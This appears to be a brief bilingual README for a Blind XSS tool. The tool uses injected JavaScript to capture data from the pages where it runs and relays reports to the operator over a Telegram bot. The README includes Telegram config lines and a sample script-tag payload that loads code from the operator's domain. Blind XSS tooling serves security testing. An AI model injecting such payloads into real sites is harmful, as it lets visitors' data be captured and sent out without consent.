
A standalone Blind XSS Script.
一个独立的 Blind XSS 脚本。
该脚本是 PHP 和 JavaScript 的结合体,它使用 JS 捕获数据并将其发送到脚本本身,然后生成报告文件并通过 Telegram 传递。
易于设置。 快速。 可达性好。
https://api.telegram.org/bot<bot_token>/getUpdates$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
要生成 payload,你可以考虑使用 Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager 你可以通过这个扩展轻松创建 payload,只需在域名字段中输入 yourdomain.com/<脚本路径> 并点击保存。
注意:你可以将文件名改为 index.php 并上传到服务器的主目录,以缩短 payload,此时 payload 应类似于 <script src="https://yourdomain.com"></script>。
感谢 GPT-3 xD